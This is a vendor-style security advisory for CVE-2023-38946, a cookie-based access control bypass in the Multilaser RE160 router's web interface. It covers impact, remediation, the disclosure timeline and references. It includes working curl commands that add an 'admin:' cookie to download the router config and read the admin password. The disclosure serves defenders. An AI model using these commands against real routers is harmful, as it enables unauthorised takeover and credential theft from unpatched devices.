Multilaser RE160 Cookie Manipulation Access Bypass Vulnerability

=====[Tempest Security Intelligence - Security Advisory -
CVE-2023-38946]=======

  Access Control Bypass in Multilaser router's Web Management Interface

  Author: Vinicius Moraes  < vinicius.moraes.w () gmail com >

=====[Table of
Contents]========================================================

1. Overview
2. Detailed description
3. Other contexts & solutions
4. Acknowledgements
5. Timeline
6. References

=====[1.
Overview]==============================================================

* Systems affected: Multilaser RE160 web interface -
V5.07.51_pt_MTL01(verified)
                                                   -
V5.07.52_pt_MTL01(verified)
                                        (other routers/versions may be
affected)
* Release date: 28/02/2024
* CVSS score: 7.7 / High
* CVSS vector:
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
* Impact: This vulnerability allows attackers to bypass the access control
of
          the router's web interface and perform management actions, such as
          changing the DNS settings, enabling router remote access,
changing the
          IP routing table, and retrieving the WiFi and management
application
          passwords. A noteworthy aspect also regards the fact that the
attack
          can be conducted remotely.

=====[2. Detailed
description]==================================================

The affected Multilaser router has a web management interface designed to
graphically assist users in configuring features and diagnosing problems.
However, there is a bug in its access control mechanism that allows
unauthenticated users to access the router's management features.

In order to exploit this bug, it is necessary to add an "admin:" cookie in
the
requests. The following example shows how an unauthenticated user (not
bearing
a credential or session token) could perform it by using the curl tool[1]
to
retrieve, for example, a backup of the router config, which contains its
web
interface password:

[snippet]

$ # traditional unauthenticated request being redirected to the login page
$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/C.cfg | grep -E
'HTTP/|Locatio'
HTTP/1.0 302 Redirect
Location: http://[routerIpAddress]/login.asp
$
$ # malicious unauthenticated request getting the web interface password
$ # (in this example: "pass123")
$ curl -isH 'Cookie: admin:' [routerIpAddress]/cgi-bin/DownloadCfg/C.cfg |
grep
-E 'HTTP/|http_passwd'
HTTP/1.0 200 OK
http_passwd=pass123

[/snippet]

By performing the aforementioned steps, an attacker gains access to all
features
of the web interface, either by exploiting the issue in other endpoints or
by
using the interface password, contained in the router config, as a
traditional
user.

This vulnerability can be exploited remotely via a malicious mobile/desktop
application performing HTTP requests against the router, or locally by
connecting to a vulnerable router (such as through the wireless
infrastructure
of a coffee shop or airport).

=====[3. Other contexts &
solutions]============================================

Conceptually, in order to fix this issue, the server receiving the request
must
always validate the value of the cookie as a prerequisite for enforcing
access
control. Besides that, this value cannot be predictable. Upon not receiving
a
valid session token within the request, users should be redirected to the
login
page.

Practically, updating to the latest firmware (V5.07.52_pt_MTL01) will
reduce the
attack window for this vulnerability, limiting the exploitation to only work
when there is an active user session on the router. However, this equipment
is
also affected by another vulnerability with the same impact and no attack
window
limitation[3].

Furthermore, Multilaser informed that they contacted the firmware vendor of
the
model RE160, but due to the age of the equipment and its limitations, it
will
not receive an update. Therefore, it is recommended to replace the RE160
router
with a new one that is receiving updates (such as RE160V or RE163V)[4][5].

=====[4.
Acknowledgements]======================================================

  Joaquim Brasil de Oliveira  < palulabrasil () gmail com >
                              < twitter.com/palulabr >
  Tempest Security Intelligence[2]

=====[5.
Timeline]==============================================================

28/04/2023 - The bug regarding model RE160 was reported to vendor;
29/06/2023 - A new contact was made with the company;
29/06/2023 - Vendor sent the available latest firmware for RE160;
07/07/2023 - It was confirmed that the latest firmware was still vulnerable;
26/10/2023 - Vendor informed that RE160 will not receive a full fix.

=====[6.
References]============================================================

  [1] https://curl.se
  [2] https://tempest.com.br
  [3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38945
  [4]
https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v
  [5]
https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v